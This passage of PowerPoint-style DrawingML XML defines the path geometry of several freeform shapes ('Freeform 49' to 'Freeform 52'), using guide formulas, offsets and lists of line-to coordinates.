                  <a:gd name="T0" fmla="*/ 136 w 646"/>
                  <a:gd name="T1" fmla="*/ 441 h 595"/>
                  <a:gd name="T2" fmla="*/ 136 w 646"/>
                  <a:gd name="T3" fmla="*/ 441 h 595"/>
                  <a:gd name="T4" fmla="*/ 94 w 646"/>
                  <a:gd name="T5" fmla="*/ 426 h 595"/>
                  <a:gd name="T6" fmla="*/ 73 w 646"/>
                  <a:gd name="T7" fmla="*/ 415 h 595"/>
                  <a:gd name="T8" fmla="*/ 58 w 646"/>
                  <a:gd name="T9" fmla="*/ 404 h 595"/>
                  <a:gd name="T10" fmla="*/ 58 w 646"/>
                  <a:gd name="T11" fmla="*/ 404 h 595"/>
                  <a:gd name="T12" fmla="*/ 31 w 646"/>
                  <a:gd name="T13" fmla="*/ 373 h 595"/>
                  <a:gd name="T14" fmla="*/ 15 w 646"/>
                  <a:gd name="T15" fmla="*/ 331 h 595"/>
                  <a:gd name="T16" fmla="*/ 15 w 646"/>
                  <a:gd name="T17" fmla="*/ 331 h 595"/>
                  <a:gd name="T18" fmla="*/ 5 w 646"/>
                  <a:gd name="T19" fmla="*/ 300 h 595"/>
                  <a:gd name="T20" fmla="*/ 0 w 646"/>
                  <a:gd name="T21" fmla="*/ 273 h 595"/>
                  <a:gd name="T22" fmla="*/ 5 w 646"/>
                  <a:gd name="T23" fmla="*/ 247 h 595"/>
                  <a:gd name="T24" fmla="*/ 11 w 646"/>
                  <a:gd name="T25" fmla="*/ 221 h 595"/>
                  <a:gd name="T26" fmla="*/ 11 w 646"/>
                  <a:gd name="T27" fmla="*/ 221 h 595"/>
                  <a:gd name="T28" fmla="*/ 26 w 646"/>
                  <a:gd name="T29" fmla="*/ 200 h 595"/>
                  <a:gd name="T30" fmla="*/ 47 w 646"/>
                  <a:gd name="T31" fmla="*/ 179 h 595"/>
                  <a:gd name="T32" fmla="*/ 73 w 646"/>
                  <a:gd name="T33" fmla="*/ 158 h 595"/>
                  <a:gd name="T34" fmla="*/ 110 w 646"/>
                  <a:gd name="T35" fmla="*/ 142 h 595"/>
                  <a:gd name="T36" fmla="*/ 499 w 646"/>
                  <a:gd name="T37" fmla="*/ 0 h 595"/>
                  <a:gd name="T38" fmla="*/ 551 w 646"/>
                  <a:gd name="T39" fmla="*/ 137 h 595"/>
                  <a:gd name="T40" fmla="*/ 189 w 646"/>
                  <a:gd name="T41" fmla="*/ 268 h 595"/>
                  <a:gd name="T42" fmla="*/ 189 w 646"/>
                  <a:gd name="T43" fmla="*/ 268 h 595"/>
                  <a:gd name="T44" fmla="*/ 158 w 646"/>
                  <a:gd name="T45" fmla="*/ 284 h 595"/>
                  <a:gd name="T46" fmla="*/ 136 w 646"/>
                  <a:gd name="T47" fmla="*/ 305 h 595"/>
                  <a:gd name="T48" fmla="*/ 136 w 646"/>
                  <a:gd name="T49" fmla="*/ 305 h 595"/>
                  <a:gd name="T50" fmla="*/ 131 w 646"/>
                  <a:gd name="T51" fmla="*/ 326 h 595"/>
                  <a:gd name="T52" fmla="*/ 136 w 646"/>
                  <a:gd name="T53" fmla="*/ 352 h 595"/>
                  <a:gd name="T54" fmla="*/ 136 w 646"/>
                  <a:gd name="T55" fmla="*/ 352 h 595"/>
                  <a:gd name="T56" fmla="*/ 141 w 646"/>
                  <a:gd name="T57" fmla="*/ 368 h 595"/>
                  <a:gd name="T58" fmla="*/ 152 w 646"/>
                  <a:gd name="T59" fmla="*/ 384 h 595"/>
                  <a:gd name="T60" fmla="*/ 162 w 646"/>
                  <a:gd name="T61" fmla="*/ 394 h 595"/>
                  <a:gd name="T62" fmla="*/ 178 w 646"/>
                  <a:gd name="T63" fmla="*/ 399 h 595"/>
                  <a:gd name="T64" fmla="*/ 194 w 646"/>
                  <a:gd name="T65" fmla="*/ 404 h 595"/>
                  <a:gd name="T66" fmla="*/ 210 w 646"/>
                  <a:gd name="T67" fmla="*/ 404 h 595"/>
                  <a:gd name="T68" fmla="*/ 252 w 646"/>
                  <a:gd name="T69" fmla="*/ 394 h 595"/>
                  <a:gd name="T70" fmla="*/ 598 w 646"/>
                  <a:gd name="T71" fmla="*/ 263 h 595"/>
                  <a:gd name="T72" fmla="*/ 645 w 646"/>
                  <a:gd name="T73" fmla="*/ 399 h 595"/>
                  <a:gd name="T74" fmla="*/ 121 w 646"/>
                  <a:gd name="T75" fmla="*/ 594 h 595"/>
                  <a:gd name="T76" fmla="*/ 73 w 646"/>
                  <a:gd name="T77" fmla="*/ 462 h 595"/>
                  <a:gd name="T78" fmla="*/ 136 w 646"/>
                  <a:gd name="T79" fmla="*/ 441 h 5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46" h="595">
                    <a:moveTo>
                      <a:pt x="136" y="441"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="136" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="441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8" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7389813" y="2998788"/>
                <a:ext cx="228600" cy="114300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 577 w 636"/>
                  <a:gd name="T1" fmla="*/ 131 h 316"/>
                  <a:gd name="T2" fmla="*/ 504 w 636"/>
                  <a:gd name="T3" fmla="*/ 152 h 316"/>
                  <a:gd name="T4" fmla="*/ 504 w 636"/>
                  <a:gd name="T5" fmla="*/ 152 h 316"/>
                  <a:gd name="T6" fmla="*/ 504 w 636"/>
                  <a:gd name="T7" fmla="*/ 152 h 316"/>
                  <a:gd name="T8" fmla="*/ 546 w 636"/>
                  <a:gd name="T9" fmla="*/ 168 h 316"/>
                  <a:gd name="T10" fmla="*/ 582 w 636"/>
                  <a:gd name="T11" fmla="*/ 184 h 316"/>
                  <a:gd name="T12" fmla="*/ 582 w 636"/>
                  <a:gd name="T13" fmla="*/ 184 h 316"/>
                  <a:gd name="T14" fmla="*/ 598 w 636"/>
                  <a:gd name="T15" fmla="*/ 200 h 316"/>
                  <a:gd name="T16" fmla="*/ 609 w 636"/>
                  <a:gd name="T17" fmla="*/ 215 h 316"/>
                  <a:gd name="T18" fmla="*/ 619 w 636"/>
                  <a:gd name="T19" fmla="*/ 231 h 316"/>
                  <a:gd name="T20" fmla="*/ 630 w 636"/>
                  <a:gd name="T21" fmla="*/ 252 h 316"/>
                  <a:gd name="T22" fmla="*/ 630 w 636"/>
                  <a:gd name="T23" fmla="*/ 252 h 316"/>
                  <a:gd name="T24" fmla="*/ 630 w 636"/>
                  <a:gd name="T25" fmla="*/ 262 h 316"/>
                  <a:gd name="T26" fmla="*/ 630 w 636"/>
                  <a:gd name="T27" fmla="*/ 262 h 316"/>
                  <a:gd name="T28" fmla="*/ 635 w 636"/>
                  <a:gd name="T29" fmla="*/ 278 h 316"/>
                  <a:gd name="T30" fmla="*/ 504 w 636"/>
                  <a:gd name="T31" fmla="*/ 315 h 316"/>
                  <a:gd name="T32" fmla="*/ 504 w 636"/>
                  <a:gd name="T33" fmla="*/ 315 h 316"/>
                  <a:gd name="T34" fmla="*/ 498 w 636"/>
                  <a:gd name="T35" fmla="*/ 294 h 316"/>
                  <a:gd name="T36" fmla="*/ 498 w 636"/>
                  <a:gd name="T37" fmla="*/ 294 h 316"/>
                  <a:gd name="T38" fmla="*/ 493 w 636"/>
                  <a:gd name="T39" fmla="*/ 273 h 316"/>
                  <a:gd name="T40" fmla="*/ 493 w 636"/>
                  <a:gd name="T41" fmla="*/ 273 h 316"/>
                  <a:gd name="T42" fmla="*/ 478 w 636"/>
                  <a:gd name="T43" fmla="*/ 236 h 316"/>
                  <a:gd name="T44" fmla="*/ 478 w 636"/>
                  <a:gd name="T45" fmla="*/ 236 h 316"/>
                  <a:gd name="T46" fmla="*/ 462 w 636"/>
                  <a:gd name="T47" fmla="*/ 221 h 316"/>
                  <a:gd name="T48" fmla="*/ 451 w 636"/>
                  <a:gd name="T49" fmla="*/ 210 h 316"/>
                  <a:gd name="T50" fmla="*/ 451 w 636"/>
                  <a:gd name="T51" fmla="*/ 210 h 316"/>
                  <a:gd name="T52" fmla="*/ 430 w 636"/>
                  <a:gd name="T53" fmla="*/ 200 h 316"/>
                  <a:gd name="T54" fmla="*/ 409 w 636"/>
                  <a:gd name="T55" fmla="*/ 194 h 316"/>
                  <a:gd name="T56" fmla="*/ 409 w 636"/>
                  <a:gd name="T57" fmla="*/ 194 h 316"/>
                  <a:gd name="T58" fmla="*/ 388 w 636"/>
                  <a:gd name="T59" fmla="*/ 194 h 316"/>
                  <a:gd name="T60" fmla="*/ 362 w 636"/>
                  <a:gd name="T61" fmla="*/ 200 h 316"/>
                  <a:gd name="T62" fmla="*/ 42 w 636"/>
                  <a:gd name="T63" fmla="*/ 294 h 316"/>
                  <a:gd name="T64" fmla="*/ 0 w 636"/>
                  <a:gd name="T65" fmla="*/ 157 h 316"/>
                  <a:gd name="T66" fmla="*/ 535 w 636"/>
                  <a:gd name="T67" fmla="*/ 0 h 316"/>
                  <a:gd name="T68" fmla="*/ 577 w 636"/>
                  <a:gd name="T69" fmla="*/ 131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36" h="316">
                    <a:moveTo>
                      <a:pt x="577" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="131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9" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7423150" y="3103563"/>
                <a:ext cx="274638" cy="117475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 578 w 763"/>
                  <a:gd name="T1" fmla="*/ 184 h 326"/>
                  <a:gd name="T2" fmla="*/ 37 w 763"/>
                  <a:gd name="T3" fmla="*/ 325 h 326"/>
                  <a:gd name="T4" fmla="*/ 0 w 763"/>
                  <a:gd name="T5" fmla="*/ 184 h 326"/>
                  <a:gd name="T6" fmla="*/ 541 w 763"/>
                  <a:gd name="T7" fmla="*/ 47 h 326"/>
                  <a:gd name="T8" fmla="*/ 578 w 763"/>
                  <a:gd name="T9" fmla="*/ 184 h 326"/>
                  <a:gd name="T10" fmla="*/ 762 w 763"/>
                  <a:gd name="T11" fmla="*/ 137 h 326"/>
                  <a:gd name="T12" fmla="*/ 646 w 763"/>
                  <a:gd name="T13" fmla="*/ 168 h 326"/>
                  <a:gd name="T14" fmla="*/ 609 w 763"/>
                  <a:gd name="T15" fmla="*/ 31 h 326"/>
                  <a:gd name="T16" fmla="*/ 725 w 763"/>
                  <a:gd name="T17" fmla="*/ 0 h 326"/>
                  <a:gd name="T18" fmla="*/ 762 w 763"/>
                  <a:gd name="T19" fmla="*/ 137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63" h="326">
                    <a:moveTo>
                      <a:pt x="578" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="184"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="762" y="137"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="646" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="137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0" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7451725" y="3198813"/>
                <a:ext cx="258763" cy="147637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 720"/>
                  <a:gd name="T1" fmla="*/ 179 h 411"/>
                  <a:gd name="T2" fmla="*/ 562 w 720"/>
                  <a:gd name="T3" fmla="*/ 210 h 411"/>
                  <a:gd name="T4" fmla="*/ 577 w 720"/>
                  <a:gd name="T5" fmla="*/ 294 h 411"/>
                  <a:gd name="T6" fmla="*/ 483 w 720"/>
                  <a:gd name="T7" fmla="*/ 310 h 411"/>
                  <a:gd name="T8" fmla="*/ 467 w 720"/>
                  <a:gd name="T9" fmla="*/ 232 h 411"/>
                  <a:gd name="T10" fmla="*/ 168 w 720"/>
                  <a:gd name="T11" fmla="*/ 294 h 411"/>
                  <a:gd name="T12" fmla="*/ 168 w 720"/>
                  <a:gd name="T13" fmla="*/ 294 h 411"/>
                  <a:gd name="T14" fmla="*/ 142 w 720"/>
                  <a:gd name="T15" fmla="*/ 300 h 411"/>
                  <a:gd name="T16" fmla="*/ 126 w 720"/>
                  <a:gd name="T17" fmla="*/ 316 h 411"/>
                  <a:gd name="T18" fmla="*/ 126 w 720"/>
                  <a:gd name="T19" fmla="*/ 316 h 411"/>
                  <a:gd name="T20" fmla="*/ 121 w 720"/>
                  <a:gd name="T21" fmla="*/ 331 h 411"/>
                  <a:gd name="T22" fmla="*/ 121 w 720"/>
                  <a:gd name="T23" fmla="*/ 357 h 411"/>
                  <a:gd name="T24" fmla="*/ 121 w 720"/>
                  <a:gd name="T25" fmla="*/ 357 h 411"/>
                  <a:gd name="T26" fmla="*/ 126 w 720"/>
                  <a:gd name="T27" fmla="*/ 373 h 411"/>
                  <a:gd name="T28" fmla="*/ 126 w 720"/>
                  <a:gd name="T29" fmla="*/ 373 h 411"/>
                  <a:gd name="T30" fmla="*/ 131 w 720"/>
                  <a:gd name="T31" fmla="*/ 389 h 411"/>
                  <a:gd name="T32" fmla="*/ 32 w 720"/>
                  <a:gd name="T33" fmla="*/ 410 h 411"/>
                  <a:gd name="T34" fmla="*/ 32 w 720"/>
                  <a:gd name="T35" fmla="*/ 410 h 411"/>
                  <a:gd name="T36" fmla="*/ 21 w 720"/>
                  <a:gd name="T37" fmla="*/ 363 h 411"/>
                  <a:gd name="T38" fmla="*/ 21 w 720"/>
                  <a:gd name="T39" fmla="*/ 363 h 411"/>
                  <a:gd name="T40" fmla="*/ 11 w 720"/>
                  <a:gd name="T41" fmla="*/ 316 h 411"/>
                  <a:gd name="T42" fmla="*/ 11 w 720"/>
                  <a:gd name="T43" fmla="*/ 316 h 411"/>
                  <a:gd name="T44" fmla="*/ 5 w 720"/>
                  <a:gd name="T45" fmla="*/ 279 h 411"/>
                  <a:gd name="T46" fmla="*/ 0 w 720"/>
                  <a:gd name="T47" fmla="*/ 247 h 411"/>
                  <a:gd name="T48" fmla="*/ 0 w 720"/>
                  <a:gd name="T49" fmla="*/ 247 h 411"/>
                  <a:gd name="T50" fmla="*/ 5 w 720"/>
                  <a:gd name="T51" fmla="*/ 226 h 411"/>
                  <a:gd name="T52" fmla="*/ 16 w 720"/>
                  <a:gd name="T53" fmla="*/ 206 h 411"/>
                  <a:gd name="T54" fmla="*/ 16 w 720"/>
                  <a:gd name="T55" fmla="*/ 206 h 411"/>
                  <a:gd name="T56" fmla="*/ 32 w 720"/>
                  <a:gd name="T57" fmla="*/ 189 h 411"/>
                  <a:gd name="T58" fmla="*/ 58 w 720"/>
                  <a:gd name="T59" fmla="*/ 179 h 411"/>
                  <a:gd name="T60" fmla="*/ 58 w 720"/>
                  <a:gd name="T61" fmla="*/ 179 h 411"/>
                  <a:gd name="T62" fmla="*/ 126 w 720"/>
                  <a:gd name="T63" fmla="*/ 158 h 411"/>
                  <a:gd name="T64" fmla="*/ 436 w 720"/>
                  <a:gd name="T65" fmla="*/ 89 h 411"/>
                  <a:gd name="T66" fmla="*/ 420 w 720"/>
                  <a:gd name="T67" fmla="*/ 22 h 411"/>
                  <a:gd name="T68" fmla="*/ 520 w 720"/>
                  <a:gd name="T69" fmla="*/ 0 h 411"/>
                  <a:gd name="T70" fmla="*/ 530 w 720"/>
                  <a:gd name="T71" fmla="*/ 69 h 411"/>
                  <a:gd name="T72" fmla="*/ 688 w 720"/>
                  <a:gd name="T73" fmla="*/ 37 h 411"/>
                  <a:gd name="T74" fmla="*/ 719 w 720"/>
                  <a:gd name="T75" fmla="*/ 179 h 4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20" h="411">
                    <a:moveTo>
                      <a:pt x="719" y="179"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="562" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="179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1" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7402513" y="3316288"/>
                <a:ext cx="285750" cy="160337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 793"/>
                  <a:gd name="T1" fmla="*/ 178 h 447"/>
                  <a:gd name="T2" fmla="*/ 110 w 793"/>
                  <a:gd name="T3" fmla="*/ 178 h 447"/>
                  <a:gd name="T4" fmla="*/ 120 w 793"/>
                  <a:gd name="T5" fmla="*/ 210 h 447"/>
                  <a:gd name="T6" fmla="*/ 125 w 793"/>
                  <a:gd name="T7" fmla="*/ 221 h 447"/>
                  <a:gd name="T8" fmla="*/ 136 w 793"/>
                  <a:gd name="T9" fmla="*/ 231 h 447"/>
                  <a:gd name="T10" fmla="*/ 136 w 793"/>
                  <a:gd name="T11" fmla="*/ 231 h 447"/>
                  <a:gd name="T12" fmla="*/ 162 w 793"/>
                  <a:gd name="T13" fmla="*/ 241 h 447"/>
                  <a:gd name="T14" fmla="*/ 194 w 793"/>
                  <a:gd name="T15" fmla="*/ 241 h 447"/>
                  <a:gd name="T16" fmla="*/ 724 w 793"/>
                  <a:gd name="T17" fmla="*/ 0 h 447"/>
                  <a:gd name="T18" fmla="*/ 745 w 793"/>
                  <a:gd name="T19" fmla="*/ 147 h 447"/>
                  <a:gd name="T20" fmla="*/ 378 w 793"/>
                  <a:gd name="T21" fmla="*/ 289 h 447"/>
                  <a:gd name="T22" fmla="*/ 378 w 793"/>
                  <a:gd name="T23" fmla="*/ 294 h 447"/>
                  <a:gd name="T24" fmla="*/ 771 w 793"/>
                  <a:gd name="T25" fmla="*/ 304 h 447"/>
                  <a:gd name="T26" fmla="*/ 792 w 793"/>
                  <a:gd name="T27" fmla="*/ 446 h 447"/>
                  <a:gd name="T28" fmla="*/ 257 w 793"/>
                  <a:gd name="T29" fmla="*/ 394 h 447"/>
                  <a:gd name="T30" fmla="*/ 257 w 793"/>
                  <a:gd name="T31" fmla="*/ 394 h 447"/>
                  <a:gd name="T32" fmla="*/ 194 w 793"/>
                  <a:gd name="T33" fmla="*/ 383 h 447"/>
                  <a:gd name="T34" fmla="*/ 141 w 793"/>
                  <a:gd name="T35" fmla="*/ 373 h 447"/>
                  <a:gd name="T36" fmla="*/ 141 w 793"/>
                  <a:gd name="T37" fmla="*/ 373 h 447"/>
                  <a:gd name="T38" fmla="*/ 99 w 793"/>
                  <a:gd name="T39" fmla="*/ 362 h 447"/>
                  <a:gd name="T40" fmla="*/ 68 w 793"/>
                  <a:gd name="T41" fmla="*/ 347 h 447"/>
                  <a:gd name="T42" fmla="*/ 68 w 793"/>
                  <a:gd name="T43" fmla="*/ 347 h 447"/>
                  <a:gd name="T44" fmla="*/ 47 w 793"/>
                  <a:gd name="T45" fmla="*/ 325 h 447"/>
                  <a:gd name="T46" fmla="*/ 31 w 793"/>
                  <a:gd name="T47" fmla="*/ 294 h 447"/>
                  <a:gd name="T48" fmla="*/ 31 w 793"/>
                  <a:gd name="T49" fmla="*/ 294 h 447"/>
                  <a:gd name="T50" fmla="*/ 15 w 793"/>
                  <a:gd name="T51" fmla="*/ 257 h 447"/>
                  <a:gd name="T52" fmla="*/ 10 w 793"/>
                  <a:gd name="T53" fmla="*/ 215 h 447"/>
                  <a:gd name="T54" fmla="*/ 0 w 793"/>
                  <a:gd name="T55" fmla="*/ 157 h 447"/>
                  <a:gd name="T56" fmla="*/ 104 w 793"/>
                  <a:gd name="T57" fmla="*/ 142 h 447"/>
                  <a:gd name="T58" fmla="*/ 104 w 793"/>
                  <a:gd name="T59" fmla="*/ 142 h 447"/>
                  <a:gd name="T60" fmla="*/ 110 w 793"/>
                  <a:gd name="T61" fmla="*/ 178 h 4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93" h="447">
                    <a:moveTo>
                      <a:pt x="110" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
